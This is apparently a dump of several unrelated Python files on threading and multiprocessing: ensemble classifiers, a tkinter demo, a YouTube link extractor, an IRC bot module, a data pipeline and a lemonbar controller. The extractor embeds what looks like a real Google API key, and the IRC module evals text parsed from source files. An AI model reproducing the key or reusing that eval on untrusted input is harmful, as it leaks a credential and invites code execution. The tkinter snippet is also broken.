        # replacement; confirm whether a bootstrap=False path is intended.
        self.bootstrap = bootstrap
        self.random_state = random_state
        # Trained estimators are collected via a multiprocessing queue
        # because fit() trains them in separate processes.
        self.Classifiers = Queue()
        self.max_depth = max_depth

    def fit(self, Xtrain, ytrain):
        '''Train the ensemble: one process per estimator, each on its own
        bootstrap sample of (Xtrain, ytrain).'''
        # set the random seed for reproducibility of experiment
        if self.random_state is not None:
            np.random.seed(self.random_state)
        # Check if base estimator is specified otherwise use decision tree
        if self.baseEstimator is None:
            self.baseEstimator = DecisiontreeClassifier(max_depth=self.max_depth, usePes=False)
        jobs = []
        # Bug fix: train self.n_estimators estimators instead of a
        # hard-coded 5, so the constructor argument is honoured.
        for i in range(self.n_estimators):
            # Generate random indices with replacement (bootstrap sample)
            ind = np.random.choice(a=Xtrain.shape[0], size=Xtrain.shape[0], replace=True)
            # Pass the bootstrapped dataset to the worker process
            p = Process(target=self._fitparallel, args=(Xtrain[ind], ytrain[ind]))
            jobs.append(p)
            p.start()
        # Wait for every training process to finish
        for proc in jobs:
            proc.join()

    def _fitparallel(self, Xtrain, ytrain):
        '''Worker body: train a copy of the base estimator and queue it.'''
        classifier = copy.copy(self.baseEstimator)
        classifier.fit(Xtrain, ytrain)
        # save the trained classifier in queue
        self.Classifiers.put(classifier)

    def predict(self, Xtest):
        '''
        :param Xtest: test data
        :return: predictions (majority vote across the trained estimators)

        NOTE(review): this drains the classifier queue, so predict() can
        only be called once per fit().
        '''
        multiplePred = []
        pred = []
        for _ in range(self.Classifiers.qsize()):
            multiplePred.append(self.Classifiers.get().predict(Xtest))
        for j in range(Xtest.shape[0]):
            # Majority vote over the per-estimator predictions for sample j.
            singlepred = []
            for i in range(len(multiplePred)):
                singlepred.append(multiplePred[i][j])
            pred.append(max(set(singlepred), key=singlepred.count))
        return np.array(pred)
class AdaboostClassifier():
    '''
    Adaboost classifier uses number of estimators with high bias like a decision tree stump
    and fits them on the dataset such that the subsequent estimators build on the mistakes
    of the previous estimators by increasing the weight of the samples which were incorrectly
    classified. This can be achieved by two methods:
    1. Sample more of the incorrectly classified data points and learn an estimator on them,
    but the error is calculated using the whole data set.
    2. Use a estimator than can handle sample weights like a decision tree which calculates
    weighted information gain.
    '''

    def __init__(self, baseEstimator=None, n_estimators=10, random_state=None, max_depth=1, useSampling=False,
                 verbose=False):
        '''
        :param baseEstimator: the estimator to be used(default: Decision Tree)
        :param n_estimators: number of estimators to be used
        :param random_state: random seed
        :param max_depth: max depth of the decision tree (default is decision stump)
        :param useSampling: Used to sample more of the incorrect predicted points(default False) Not implemented yet
        :param verbose: used to print out the values while calculating(default False)
        '''
        self.baseEstimator = baseEstimator
        self.n_estimators = n_estimators
        self.random_state = random_state
        # List of (fitted classifier, alpha weight) pairs built by fit().
        self.Classifiers = []
        self.max_depth = max_depth
        self.useSampling = useSampling
        self.verbose = verbose

    def fit(self, Xtrain, ytrain):
        '''
        :param Xtrain: training data
        :param ytrain: training labels
        :return: None
        '''
        # set the random seed for reproducibility of experiment
        if self.random_state != None:
            np.random.seed(self.random_state)
        # Check if base estimator is specified otherwise use decision tree
        if self.baseEstimator == None:
            self.baseEstimator = DecisiontreeClassifier(max_depth=self.max_depth)
        'Initialize the weights of data points to a uniform distribution'
        D = np.array([1 / (Xtrain.shape[0] * 1.0) for _ in range(Xtrain.shape[0])])
        for i in range(self.n_estimators):
            classifier = copy.copy(self.baseEstimator)
            if self.useSampling == True:
                ind = np.random.choice(a=Xtrain.shape[0], size=Xtrain.shape[0], p = D)
                'to be implemented'
            else:
                # Weighted-training path: the estimator consumes per-sample
                # weights directly via its sampleWeights attribute.
                classifier.sampleWeights = D
                classifier.fit(Xtrain, ytrain)
            pred = np.array(classifier.predict(Xtrain))
            pred = pred.reshape((pred.shape[0], 1))
            # Weighted error: sum of weights of misclassified samples.
            weightedError = 0
            for j in range(Xtrain.shape[0]):
                if pred[j] != ytrain[j]:
                    weightedError += D[j]
            # Estimator vote weight.  NOTE(review): divides by
            # weightedError — a perfect estimator (error 0) produces a
            # division by zero here; confirm inputs make that impossible.
            alpha = (1 / 2) * np.log((1 - weightedError) / (weightedError))
            if self.verbose == True:
                print('weighted error', weightedError)
                print('alpha:', alpha)
            self.Classifiers.append((classifier, alpha))
            # Re-weight samples: up-weight mistakes, down-weight hits.
            for j in range(Xtrain.shape[0]):
                if pred[j] != ytrain[j]:
                    D[j] *= math.exp(alpha)
                else:
                    D[j] *= math.exp(-alpha)
            'Normalize the weights of data points'
            sumofWeights = np.sum(D)
            D = np.array([x / sumofWeights for x in D])

    def predict(self, Xtest):
        '''
        :param Xtest: test data
        :return: predictions {0,1}

        NOTE(review): the alpha-weighted vote below thresholds at 0 while
        predictions are in {0,1} (not the usual {-1,+1}); verify this is
        the intended decision rule.
        '''
        multiplePred = []
        pred = []
        for classifier, weight in self.Classifiers:
            multiplePred.append((classifier.predict(Xtest), weight))
        for j in range(Xtest.shape[0]):
            singlepred = 0
            for i in range(len(self.Classifiers)):
                singlepred += multiplePred[i][0][j] * multiplePred[i][1]
            if singlepred >= 0:
                pred.append(1)
            else:
                pred.append(0)
        return np.array(pred)
|
tkinter-threading.py | from mktinter import *
import tkinter.ttk as ttk
import time
import threading
def callback():
total = sum(range(100000000))
print(total)
#label.config(text=total)
def handle_click():
t.start()
def move_progress():
for i in range(20):
pb.step()
root.update()
time.sleep(.02)
root = Tk()
t = threading.Thread(target=callback, daemon=True)
Button(root, text='Add it up', command=handle_click).pack()
pgMove = Button(root)
pgMove['text'] = "Move"
pgMove['fg'] = "green"
pgMove['command'] = move_progress
pgMove.pack()
pb = ttk.Progressbar(root, orient='horizontal', length=400, mode='determinate')
pb.pack()
label = Label(root)
label.pack()
root.mainloop() |
youtubeExternallinkSite.py | # coding: utf-8
import re
import threading
from ..extractor.common import InfoExtractor
from ..utils import (
compat_urllib_parse,
parse_duration,
)
class YoutubeExternallinkSiteIE(InfoExtractor):
    """Resolve external music-site track pages to YouTube entries.

    Track/artist queries are sent (in parallel threads) to a lookup
    service which maps them to YouTube video ids; metadata is then
    fetched from the YouTube Data API v3.
    """
    _VALID_URL = r'https?://(.*\.)napster.com/artist/(.*)track/.*'
    _TEST = {
        'url': 'http://gb.napster.com/artist/madness/album/keep-moving-salvo/track/wings-of-a-dove',
    }

    def __init__(self):
        # NOTE(review): InfoExtractor.__init__ is not chained here —
        # confirm the extractor framework tolerates that before relying
        # on downloader-dependent base-class helpers.
        self._lock = threading.Lock()

    def getVideoInfo(self, vid):
        """Fetch metadata for YouTube video id *vid* from the Data API v3."""
        url = 'https://www.googleapis.com/youtube/v3/videos?part=snippet%2CcontentDetails' \
              '&key=AIzaSyBW7ikTCKkhOZqSPUPkf5xVw12cjYKI5Ag&id=' + vid
        data = self._download_json(url, url)
        return {
            'id': vid,
            'url': 'https://www.youtube.com/watch?v=%s' % vid,
            'title': data['items'][0]['snippet']['title'],
            'thumbnail': data['items'][0]['snippet']['thumbnails']['default'],
            'description': data['items'][0]['snippet']['description'],
            'duration': parse_duration(data['items'][0]['contentDetails']['duration']),
        }

    def getEntries(self, querylist):
        """Build bare (unresolved) entries from (track, artist, duration) tuples."""
        entries = []
        for track, artist, duration in querylist:
            entries.append({
                'id': None,
                'title': track,
                'artist': artist,
                'duration': duration,
            })
        return entries

    def appendEntry(self, entries, entry):
        """Thread-safely append *entry* to the shared *entries* list."""
        with self._lock:
            entries.append(entry)

    def getVideoInfoEx(self, url, artist, track, duration, entries):
        """Resolve one lookup *url* to a full entry and append it to *entries*.

        Falls back to the caller-supplied duration/artist when the API
        response leaves them empty.  Failures are logged and swallowed so
        one bad track does not abort the batch.
        """
        print(url)
        try:
            data = self._download_json(url, url)
            info = self.getVideoInfo(data['id'])
            if info.get('duration','') == '':
                info['duration'] = duration
            if info.get('artist','') == '':
                info['artist'] = artist
            self.appendEntry(entries, info)
        except Exception as e:
            # Bug fix: Exception has no .message attribute in Python 3 —
            # format the exception object itself.
            print('getVideoInfo %s exception: %s' % (url, e))
            pass

    def getEntriesEx(self, querylist):
        """Resolve every query concurrently; returns the collected entries.

        *querylist* items are either (track, artist, duration) or
        (artist, track) tuples; the latter get an empty duration.
        """
        if (len(querylist)>0):
            # Renamed from 'list' to avoid shadowing the builtin.
            query_urls = []
            if len(querylist[0]) > 2:
                query_urls = [('http://groovesharks.org/music/getYoutube/?' +
                               compat_urllib_parse.urlencode({'track': track, 'artist': artist}), artist, track, duration) for track, artist, duration in querylist]
            else:
                query_urls = [('http://groovesharks.org/music/getYoutube/?' +
                               compat_urllib_parse.urlencode({'track': track, 'artist': artist}), artist, track, '') for artist, track in querylist]
            threadList = []
            entries = []
            for url, artist, track, duration in query_urls:
                try:
                    t = threading.Thread(target=self.getVideoInfoEx, args=(url, artist, track, duration, entries))
                    threadList.append(t)
                    # Modernized: setDaemon() is deprecated.
                    t.daemon = True
                    t.start()
                except:
                    pass
            for t in threadList:
                t.join()
            return entries
        else:
            return []

    def getVideoInfByID(self, VID, entries):
        """Resolve a known YouTube id to an entry, with placeholder fallbacks."""
        try:
            info = self.getVideoInfo(VID)
            if info.get('duration','') == '':
                info['duration'] = '3:40'
            if info.get('artist','') == '':
                # Typo fix: 'unkown' -> 'unknown'.
                info['artist'] = 'unknown'
            self.appendEntry(entries, info)
        except Exception as e:
            # Bug fix: Exception has no .message attribute in Python 3.
            print('getVideoInfo %s exception: %s' % (VID, e))
            pass

    def getEntriesByID(self, VIDS):
        """Resolve a list of YouTube ids concurrently; returns the entries."""
        if (len(VIDS)>0):
            threadList = []
            entries = []
            for ID in VIDS:
                try:
                    t = threading.Thread(target=self.getVideoInfByID, args=(ID, entries))
                    threadList.append(t)
                    # Modernized: setDaemon() is deprecated.
                    t.daemon = True
                    t.start()
                except:
                    pass
            for t in threadList:
                t.join()
            return entries
        else:
            return []
|
progress_dict.py | from multiprocessing import Manager, Process
def to_add(d, k, v):
    """Store value *v* under key *k* in mapping *d*.

    Used as a Process target with a Manager-backed dict, so the write is
    visible across processes.
    """
    d[k] = v
if __name__ == "__main__":
    # A Manager-backed dict is shared between processes through a proxy,
    # so writes made in the children are visible here.
    process_dict = Manager().dict()
    p1 = Process(target=to_add, args=(process_dict, 'name', 'li'))
    p2 = Process(target=to_add, args=(process_dict, 'age', 13))
    p1.start()
    p2.start()
    p1.join()
    p2.join()
    print(process_dict)
|
commandsquery.py | # coding=utf-8
from __future__ import unicode_literals, absolute_import, division, print_function
import sopel
from sopel import module
from sopel.tools import stderr
import os
from difflib import SequenceMatcher
from operator import itemgetter
import threading
try:
from sopel_modules.botevents.botevents import *
botevents_installed = True
except ImportError:
botevents_installed = False
import spicemanip
def configure(config):
    """No configuration options for this module."""
def setup(bot):
    """Kick off command-list discovery in a background thread so bot
    startup is not blocked by the filesystem scan."""
    stderr("[Sopel-CommandsQuery] Evaluating Core Commands List")
    worker = threading.Thread(target=setup_thread, args=(bot,))
    worker.start()
def setup_thread(bot):
    """Scan every installed Sopel module's source for command decorators
    and build the in-memory command registry.

    Populates bot.memory['Sopel-CommandsQuery'] with one dict per command
    type ('module', 'nickname', 'rule') plus per-type counters.
    """
    bot.memory['Sopel-CommandsQuery'] = dict()
    for comtype in ['module', 'nickname', 'rule']:
        bot.memory['Sopel-CommandsQuery'][comtype + "_commands"] = dict()
        bot.memory['Sopel-CommandsQuery'][comtype + "_commands_count"] = 0
    filepathlisting = []
    # main Modules directory
    main_dir = os.path.dirname(os.path.abspath(sopel.__file__))
    modules_dir = os.path.join(main_dir, 'modules')
    filepathlisting.append(modules_dir)
    # Home Directory
    home_modules_dir = os.path.join(bot.config.homedir, 'modules')
    if os.path.isdir(home_modules_dir):
        filepathlisting.append(home_modules_dir)
    # pypi installed
    try:
        import sopel_modules
        pypi_modules = os.path.dirname(os.path.abspath(sopel_modules.__file__))
        pypi_modules_dir = os.path.join(pypi_modules, 'modules')
        filepathlisting.append(pypi_modules_dir)
    except Exception:
        pass
    # Extra directories
    filepathlist = []
    for directory in bot.config.core.extra:
        filepathlisting.append(directory)
    for directory in filepathlisting:
        for pathname in os.listdir(directory):
            path = os.path.join(directory, pathname)
            # Bug fix: the private-module check must look at the file
            # name, not the joined path — an absolute path never starts
            # with '_', so '_private.py' modules were never excluded.
            if (os.path.isfile(path) and path.endswith('.py') and not pathname.startswith('_')):
                filepathlist.append(str(path))
    # CoreTasks
    ct_path = os.path.join(main_dir, 'coretasks.py')
    filepathlist.append(ct_path)
    for modulefile in filepathlist:
        module_file_lines = []
        module_file = open(modulefile, 'r')
        lines = module_file.readlines()
        for line in lines:
            module_file_lines.append(line)
        module_file.close()
        dict_from_file = dict()
        filelinelist = []
        # NOTE(security): eval() below executes decorator-argument text
        # read from module sources.  Acceptable only because these are
        # locally installed modules, never untrusted input.
        for line in module_file_lines:
            if str(line).startswith("@"):
                line = str(line)[1:]
                # Commands
                if str(line).startswith(tuple(["commands", "module.commands", "sopel.module.commands"])):
                    comtype = "module"
                    line = str(line).split("commands(")[-1]
                    line = str("(" + line)
                    validcoms = eval(str(line))
                    if isinstance(validcoms, tuple):
                        validcoms = list(validcoms)
                    else:
                        validcoms = [validcoms]
                    validcomdict = {"comtype": comtype, "validcoms": validcoms}
                    filelinelist.append(validcomdict)
                elif str(line).startswith(tuple(["nickname_commands", "module.nickname_commands", "sopel.module.nickname_commands"])):
                    comtype = "nickname"
                    line = str(line).split("commands(")[-1]
                    line = str("(" + line)
                    validcoms = eval(str(line))
                    if isinstance(validcoms, tuple):
                        validcoms = list(validcoms)
                    else:
                        validcoms = [validcoms]
                    # Nickname commands are invoked as "<botnick> <command>".
                    nickified = []
                    for nickcom in validcoms:
                        nickified.append(str(bot.nick) + " " + nickcom)
                    validcomdict = {"comtype": comtype, "validcoms": nickified}
                    filelinelist.append(validcomdict)
                elif str(line).startswith(tuple(["rule", "module.rule", "sopel.module.rule"])):
                    comtype = "rule"
                    line = str(line).split("rule(")[-1]
                    validcoms = [str("(" + line)]
                    validcomdict = {"comtype": comtype, "validcoms": validcoms}
                    filelinelist.append(validcomdict)
        for atlinefound in filelinelist:
            comtype = atlinefound["comtype"]
            validcoms = atlinefound["validcoms"]
            comtypedict = str(comtype + "_commands")
            bot.memory['Sopel-CommandsQuery'][comtypedict + "_count"] += 1
            # default command to filename
            # NOTE(review): dict_from_file is filled only once per module
            # file, so subsequent decorators in the same file register as
            # aliases of the first — presumably intentional; confirm.
            if "validcoms" not in dict_from_file.keys():
                dict_from_file["validcoms"] = validcoms
            maincom = dict_from_file["validcoms"][0]
            if len(dict_from_file["validcoms"]) > 1:
                comaliases = spicemanip.main(dict_from_file["validcoms"], '2+', 'list')
            else:
                comaliases = []
            bot.memory['Sopel-CommandsQuery'][comtypedict][maincom] = dict_from_file
            for comalias in comaliases:
                if comalias not in bot.memory['Sopel-CommandsQuery'][comtypedict].keys():
                    bot.memory['Sopel-CommandsQuery'][comtypedict][comalias] = {"aliasfor": maincom}
    for comtype in ['module_commands', 'nickname_commands', 'rule_commands']:
        stderr("[Sopel-CommandsQuery] Found " + str(len(bot.memory['Sopel-CommandsQuery'][comtype].keys())) + " " + comtype + " commands.")
    if botevents_installed:
        set_bot_event(bot, "Sopel-CommandsQuery")
@module.rule(r'^\?(.*)')
def query_detection(bot, trigger):
    """Answer '?<prefix>' queries about available bot commands.

    Supports: single-letter prefix listing, '<command>+' alias expansion,
    '<command>?' fuzzy matching, exact lookup, and prefix listing.
    """
    # NOTE(review): busy-wait until setup_thread has populated memory;
    # consider an Event if this ever burns noticeable CPU at startup.
    while "Sopel-CommandsQuery" not in bot.memory:
        pass
    # command must start with
    if not str(trigger).startswith(tuple(['?'])):
        return
    stderr(trigger.args)
    # Flatten every command type into a single lookup table.
    commands_list = dict()
    for commandstype in bot.memory['Sopel-CommandsQuery'].keys():
        if not commandstype.endswith("_count"):
            for com in bot.memory['Sopel-CommandsQuery'][commandstype].keys():
                if com not in commands_list.keys():
                    commands_list[com] = bot.memory['Sopel-CommandsQuery'][commandstype][com]
    triggerargsarray = spicemanip.main(trigger, 'create')
    # command issued, check if valid
    querycommand = spicemanip.main(triggerargsarray, 1).lower()[1:]
    if len(querycommand) == 1:
        # Single character: list all commands with that prefix.
        commandlist = []
        for command in commands_list.keys():
            if command.lower().startswith(querycommand):
                commandlist.append(command)
        if commandlist == []:
            bot.notice("No commands match " + str(querycommand) + ".", trigger.nick)
            return
        else:
            bot.notice("The following commands match " + str(querycommand) + ": " + spicemanip.main(commandlist, 'andlist') + ".", trigger.nick)
            return
    elif querycommand.endswith(tuple(["+"])):
        # '<command>+': expand to the command's full alias list.
        querycommand = querycommand[:-1]
        if querycommand not in commands_list.keys():
            # Bug fix: recipient was missing, sending the notice to the
            # channel instead of the asking user like every other reply.
            bot.notice("The " + str(querycommand) + " does not appear to be valid.", trigger.nick)
            return
        realcom = querycommand
        if "aliasfor" in commands_list[querycommand].keys():
            realcom = commands_list[querycommand]["aliasfor"]
        validcomlist = commands_list[realcom]["validcoms"]
        bot.notice("The following commands match " + str(querycommand) + ": " + spicemanip.main(validcomlist, 'andlist') + ".", trigger.nick)
        return
    elif querycommand.endswith(tuple(['?'])):
        # '<command>?': fuzzy-match and return the ten closest commands.
        querycommand = querycommand[:-1]
        sim_com, sim_num = [], []
        for com in commands_list.keys():
            similarlevel = SequenceMatcher(None, querycommand.lower(), com.lower()).ratio()
            sim_com.append(com)
            sim_num.append(similarlevel)
        sim_num, sim_com = (list(x) for x in zip(*sorted(zip(sim_num, sim_com), key=itemgetter(0))))
        closestmatch = spicemanip.main(sim_com, 'reverse', "list")
        listnumb, relist = 1, []
        for item in closestmatch:
            if listnumb <= 10:
                relist.append(str(item))
            listnumb += 1
        bot.notice("The following commands may match " + str(querycommand) + ": " + spicemanip.main(relist, 'andlist') + ".", trigger.nick)
        return
    elif querycommand in commands_list.keys():
        bot.notice("The following commands match " + str(querycommand) + ": " + str(querycommand) + ".", trigger.nick)
        return
    elif not querycommand:
        return
    else:
        # Fallback: treat the query as a prefix.
        commandlist = []
        for command in commands_list.keys():
            if command.lower().startswith(querycommand):
                commandlist.append(command)
        if commandlist == []:
            bot.notice("No commands match " + str(querycommand) + ".", trigger.nick)
            return
        else:
            bot.notice("The following commands match " + str(querycommand) + ": " + spicemanip.main(commandlist, 'andlist') + ".", trigger.nick)
            return
def commandsquery_register(bot, command_type, validcoms, aliasfor=None):
    """Register a command (or aliases of one) in the bot's command registry.

    :param bot: the Sopel bot (its .memory mapping is used as storage).
    :param command_type: registry bucket, e.g. 'module_commands'.
    :param validcoms: command name or list of names (first is the main one).
    :param aliasfor: when given, every name in *validcoms* is registered
        as an alias of that existing command instead.
    """
    if not isinstance(validcoms, list):
        validcoms = [validcoms]
    if 'Sopel-CommandsQuery' not in bot.memory:
        bot.memory['Sopel-CommandsQuery'] = dict()
    registry = bot.memory['Sopel-CommandsQuery']
    counter_key = command_type + "_count"
    if command_type not in registry:
        registry[command_type] = dict()
        registry[counter_key] = 0
    registry[counter_key] += 1
    entry = {"validcoms": validcoms}
    if aliasfor:
        comaliases = validcoms
    else:
        maincom = validcoms[0]
        comaliases = (spicemanip.main(validcoms, '2+', 'list')
                      if len(validcoms) > 1 else [])
        registry[command_type][maincom] = entry
    for comalias in comaliases:
        if comalias not in registry[command_type]:
            registry[command_type][comalias] = {"aliasfor": aliasfor}
|
dif-process.py | # Example of processes with different functions
from multiprocessing import Process
import time
def Hello():
    """Print, wait five seconds, print again (simulates slow work)."""
    print("start hello")
    time.sleep(5)
    print("hello")

def Hi():
    """Same shape as Hello with different messages."""
    print("start hi")
    time.sleep(5)
    print("hi there")

# Bug fix: process creation/start must be guarded — under the 'spawn'
# start method (Windows/macOS default) child processes re-import this
# module, and unguarded Process(...).start() at module level recurses.
if __name__ == '__main__':
    hello = Process(target=Hello)
    hi = Process(target=Hi)
    threads = [hello, hi]
    for thread in threads:
        thread.start()
|
multicore_run.py | import multiprocessing
from pipeline.entitylinker import *
from pipeline.triplealigner import *
from pipeline.datareader import WikiDataAbstractsDataReader
from pipeline.writer import JsonWriter, JsonlWriter, OutputSplitter, NextFile
from utils.triplereader import *
from pipeline.filter import *
import argparse
from timeit import default_timer
__START_DOC__ = 0 #start reading from document number
__CORES__ = 7
# NOTE(review): os and sys are used below but not imported in this file's
# visible import block — presumably they arrive via a star import; confirm.
parser = argparse.ArgumentParser(prog=os.path.basename(sys.argv[0]),
                                 formatter_class=argparse.RawDescriptionHelpFormatter,
                                 description=__doc__)
parser.add_argument("--input", default = 'text/ko',
                    help="XML wiki dump file")
parser.add_argument("--output", default = './out/ko',
                    help="XML wiki dump file")
parser.add_argument("--input_triples", default = 'data/ko/wikidata-triples-ko-subj.db',
                    help="XML wiki dump file")
parser.add_argument("--language", default = 'ko',
                    help="language to use")
args = parser.parse_args()
# Reading the Wikipedia Abstracts Dataset
reader = WikiDataAbstractsDataReader(args.input)
# Document filters: require the main entity, 2..100 entities, >= 1 triple.
main_ent_lim = MainEntityLimiter()
min_ent_lim = EntityLimiter(2, 100)
min_trip_lim = MinTriplesLimiter(1)
# min_trip_lim = TriplesLimiter(5, 500)
# Wikidata classes (P31 values) whose documents are skipped entirely.
filter_entities = ['Q4167410', 'Q13406463', 'Q18340514', 'Q12308941', 'Q11879590', 'Q101352']
# trip_read = TripleSPARQLReader('./datasets/wikidata/wikidata-triples.csv')
# Pick the triple backend from the input file extension.
if args.input_triples.endswith('.db'):
    trip_read = TripleDBReader(args.input_triples, args.language)
else:
    trip_read = TripleCSVReader(args.input_triples, args.language)
Salign = SimpleAligner(trip_read)
#prop = WikidataPropertyLinker('./datasets/wikidata/wikidata-properties.csv')
# Select a spaCy model for the requested language (generic fallback last).
if args.language == 'zh':
    spacy_model = 'zh_core_web_sm'
elif args.language == 'en':
    spacy_model = 'en_core_web_sm'
elif args.language == 'es' or args.language == 'ca':
    spacy_model = 'es_core_news_sm'
elif args.language == 'it':
    spacy_model = 'it_core_news_sm'
else:
    spacy_model = 'xx_ent_wiki_sm'
# date = DateLinkerSpacy(spacy_model)
date = DateLinkerRegex(args.language)
#SPOalign = SPOAligner(trip_read)
NSalign = NoSubjectAlign(trip_read)
# writer = JsonlWriter(args.output, "re-nlg", filesize=5000, startfile=__START_DOC__)
# Output files are rotated every 5000 documents.
nextFile = NextFile(args.output)
output = OutputSplitter(nextFile, 5000, False)
def multhithreadprocess(q, output_queue):
    """Worker loop: pull documents from *q*, run the annotation pipeline,
    and push surviving documents to *output_queue*.

    Exits when the ``None`` sentinel is received.  The pipeline stages run
    in a fixed order: class filter, date linking, entity limits, aligners,
    triple limit.
    """
    while True:
        d = q.get()
        if d is None:
            # Sentinel: no more work.
            break
        # Skip documents whose entity is an instance of a filtered class.
        if trip_read.get_exists(d.uri, 'P31', filter_entities):
            continue
        d = date.run(d)
        # d = date.run(d)
        if not main_ent_lim.run(d):
            # output_queue.put('skip')
            continue
        if not min_ent_lim.run(d):
            # output_queue.put('skip')
            continue
        d = NSalign.run(d)
        d = Salign.run(d)
        if not min_trip_lim.run(d):
            # output_queue.put('skip')
            continue
        output_queue.put(d)
def reduce_process(output_queue, output):
    """Pull finished documents and write them out, reporting throughput.

    Runs until a ``None`` sentinel arrives.  Items equal to ``'skip'`` are
    dropped without being written.  Every *period* written documents a
    simple articles-per-second rate is printed.

    :param output_queue: queue of processed documents (``None`` terminates).
    :param output: writer object; each document is passed to ``output.run``.
    """
    print('reduce_process')
    period = 5000
    interval_start = default_timer()
    # Cleanup: removed the unused ordering_buffer/next-ordinal leftovers
    # (and their FIXME) from a page-ordering feature that no longer exists.
    written = 0  # documents handed to the writer so far
    while True:
        d = output_queue.get()
        if d is None:
            # Sentinel from the main process: all workers are finished.
            break
        if d == 'skip':
            continue
        output.run(d)
        written += 1
        if written % period == 0:
            interval_rate = period / (default_timer() - interval_start)
            print(f"Extracted {written} articles ({interval_rate} art/s)")
            interval_start = default_timer()
if __name__ == '__main__':
    # multiprocessing.set_start_method('spawn')
    # output queue
    interval_start = default_timer()
    output_queue = multiprocessing.Queue(maxsize=__CORES__*20)
    # Reduce job that sorts and prints output
    reduce = multiprocessing.Process(target=reduce_process, args=(output_queue, output))
    reduce.start()
    try:
        # __CORES__ = 2
        # Bounded work queue provides back-pressure on the reader.
        q = multiprocessing.Queue(maxsize=__CORES__*20)
        # iolock = ctx.Lock()
        # pool = ctx.Pool(__CORES__, initializer=multhithreadprocess, initargs=(q, writer_output))
        workers = []
        for _ in range(max(1, __CORES__)):
            extractor = multiprocessing.Process(target=multhithreadprocess,
                                                args=(q, output_queue))
            extractor.daemon = True  # only live while parent process lives
            extractor.start()
            workers.append(extractor)
        for d in reader.read_documents():
            # if trip_read.get_exists(d.uri, 'P31', filter_entities):
            #     continue
            # d = date.run(d)
            q.put(d)  # blocks until q below its max size
        for _ in workers:  # tell workers we're done
            q.put(None)
        # signal termination
        # wait for workers to terminate
        for w in workers:
            w.join()
        # signal end of work to reduce process
        output_queue.put(None)
        # wait for it to finish
        reduce.join()
    finally:
        # NOTE(review): this cleanup re-runs even after the clean path
        # above (sentinels re-sent, processes re-joined — both harmless),
        # but raises NameError if an exception fires before `workers`
        # is defined; confirm that path cannot occur in practice.
        for _ in workers:  # tell workers we're done
            q.put(None)
        # signal termination
        # wait for workers to terminate
        for w in workers:
            w.join()
        # signal end of work to reduce process
        output_queue.put(None)
        # wait for it to finish
        reduce.join()
    print(f'Finished in {(default_timer() - interval_start)}')
|
__init__.py |
import logging
import time
import threading
from barython import tools
from barython.hooks import HooksPool
logger = logging.getLogger("barython")
class _BarSpawner():
    """
    Owns the lifecycle of a lemonbar child process: spawning it, feeding it
    content on stdin, and stopping it.

    Subclasses must implement :meth:`gather`; ``self.refresh`` and
    ``self.panel`` are expected to be provided by subclasses as well
    (not set here — TODO confirm against Screen/Panel).
    """
    # Last content written to the bar; lets draw() skip redundant redraws.
    _cache = None

    def _write_in_bar(self, content):
        """Write raw bytes to lemonbar's stdin and flush, unless stopped."""
        if self._stop.is_set():
            return
        self._bar.stdin.write(content)
        logger.debug("Writing {}".format(content))
        self._bar.stdin.flush()

    def draw(self):
        """
        Draws the bar on the screen
        """
        content = (self.gather() + "\n").encode()
        # Nothing changed since the last draw: skip the write entirely.
        if self._cache == content:
            return
        self._cache = content
        # if stopped, do not init lemonbar
        if not self._stop.is_set():
            try:
                self._write_in_bar(content)
            except (BrokenPipeError, AttributeError):
                # Pipe broken or bar never spawned: (re)start lemonbar.
                logger.info("Lemonbar is off, init it")
                if getattr(self, "_bar", None) and self._bar.poll() is None:
                    # lemonbar seems to have crashed, kill it
                    self.stop_bar(kill=True)
                self.init_bar()
                self._write_in_bar(content)
        else:
            logger.debug("Screen is stopped, will not draw anything")

    def gather(self):
        """
        Gather all widgets content
        """
        raise NotImplementedError()

    def update(self, no_wait=False):
        """
        Ask to redraw the screen or the global panel

        If more than one widget is waiting for the barrier, it is meaningless
        to wait too (because its value will be taken in account by the update
        ran by the waiting widget).
        A sleep is launched at the end to respect the refresh rate set for this
        Screen.

        :param no_wait: does not wait for the refresh time before leaving
        """
        # BUGFIX: the acquire used to live *inside* the try, so returning
        # early when the non-blocking acquire failed still executed the
        # ``finally`` release, incrementing the Semaphore counter beyond its
        # initial value of 2. Acquire first; only enter try once we hold it.
        locked = self._refresh_lock.acquire(blocking=False)
        # More than 2 threads are already here, doesn't make any sense to
        # wait because the screen will be updated
        if not locked:
            return
        try:
            with self._update_lock:
                self.draw()
                if not no_wait:
                    time.sleep(self.refresh)
        finally:
            self._refresh_lock.release()

    def init_bar(self):
        """
        Spawn lemonbar and store the pipe in self._bar

        Before starting, tries to terminate self._bar in case of refresh
        """
        if self._stop.is_set():
            return None
        screen_geometry = self.geometry
        if screen_geometry:
            # Shrink/shift the screen geometry by the configured offsets.
            w, h, x, y = screen_geometry
            w -= self.offset[0] + self.offset[1]
            h = self.height
            x += self.offset[0]
            y += self.offset[2]
            geometry = (w, h, x, y)
        else:
            geometry = (None, self.height)
        bar_cmd = getattr(self, "bar_cmd", None) or self.panel.bar_cmd
        self._bar = tools.lemonbar(
            bar_cmd=bar_cmd, geometry=geometry, fonts=self.fonts,
            fg=self.fg, bg=self.bg, clickable=self.clickable
        )

    def propage_hooks_changes(self):
        """
        Propage a change in the hooks pool
        """
        pass

    def start(self):
        """Reset the cache and mark the spawner as running."""
        self._cache = None
        self._stop.clear()
        self.hooks.start()

    def stop_bar(self, kill=False):
        """
        Terminates or kill the bar
        """
        try:
            if kill:
                self._bar.kill()
            else:
                self._bar.terminate()
            self._bar.wait()
            self._bar = None
        except Exception:
            # Best effort: the bar may already be dead or never spawned
            # (self._bar is None). Was a bare ``except:`` which also trapped
            # SystemExit/KeyboardInterrupt.
            pass

    def stop(self, *args, **kwargs):
        """
        Stop the screen
        """
        self._stop.set()
        self.stop_bar()

    def restart(self, *args, **kwargs):
        """Stop, then start again from a background thread."""
        self.stop()
        threading.Thread(target=self.start).start()

    def __init__(self, offset=None, height=18, geometry=None, fg=None,
                 bg=None, fonts=None, clickable=10):
        #: used to limit the update
        self._update_lock = threading.Lock()
        self._refresh_lock = threading.Semaphore(2)
        #: event to stop the screen
        self._stop = threading.Event()
        self._stop.set()
        self.height = height
        self.offset = offset if offset is not None else (0, 0, 0)
        self.geometry = geometry
        self.fg = fg
        self.bg = bg
        self.fonts = fonts
        self.clickable = clickable
        self.hooks = HooksPool(parent=self)
from .panel import Panel
from .screen import Screen
|
_worker.py | import atexit
import threading
import os
from .internal.logger import get_logger
_LOG = get_logger(__name__)
class PeriodicWorkerThread(object):
    """Periodic worker thread.

    This class can be used to instantiate a worker thread that will run its `run_periodic` function every `interval`
    seconds.

